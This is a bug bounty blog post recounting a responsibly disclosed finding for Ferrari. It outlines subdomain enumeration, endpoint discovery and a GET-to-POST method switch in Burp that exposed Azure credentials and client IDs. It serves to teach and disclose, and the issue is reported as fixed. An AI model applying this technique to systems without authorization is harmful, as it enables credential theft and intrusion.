Hi Leets 👨💻 !
In this blog✍ , I am delighted to recount my journey of achieving a place in the Iconic Brand Ferrari’s Hall of Fame by securing their products and services.
Lets Start. . .🐞
Vulnerability: Sensitive Information Disclosure
Sensitive Information Disclosure is a security 🛠 vulnerability that occurs when sensitive or confidential 👀 data is unintentionally exposed to unauthorized individuals or entities. This vulnerability can arise from various sources, such as insecure configurations, coding errors,
inadequate access controls, or weaknesses in network communication protocols. Attackers can exploit this vulnerability to gain access to sensitive data, leading to potential privacy breaches, identity theft, financial loss, or reputation damage for individuals or organizations.
Steps to Reproduce:
- Enumerated the subdomains using tools such as amass, subfinder, findomain, assetfinder etc.
- Remove the duplicate domains from above results.
- Find the live subdomains by using httpx or httprobe and selected one subdomain ( https://test.redact.com )
- Identified couple of endpoints; used dirsearch for this part
- Checked each endpoints individually and noted one of them are not accessible via GET request.(https://test.redact.com/api/consumer/systemsettings)
6. So I intercepted the request using Burp-suite and changed the request method from GET to POST and added the content-length as well and send the request.
7. After thoroughly reviewing the response, and really surprised 😲 that I was able to fetch ♨ sensitive information such as AzureAuthuserId, AzureAuth Password, Client IDs, Consumer IDs, Internal path endpoints and many more. . .
I made an attempt to escalate the vulnerability, but encountered some challenges. Subsequently, I prepared a comprehensive report 📖 and shared it with the appropriate team as a contribution to their Responsible Disclosure Program.
A few days later, the team successfully resolved the issue & acknowledged my contribution by including my name in their Hall of Fame 🌟
Thank you for passing by ! :🖐
Happy Hunting :🐞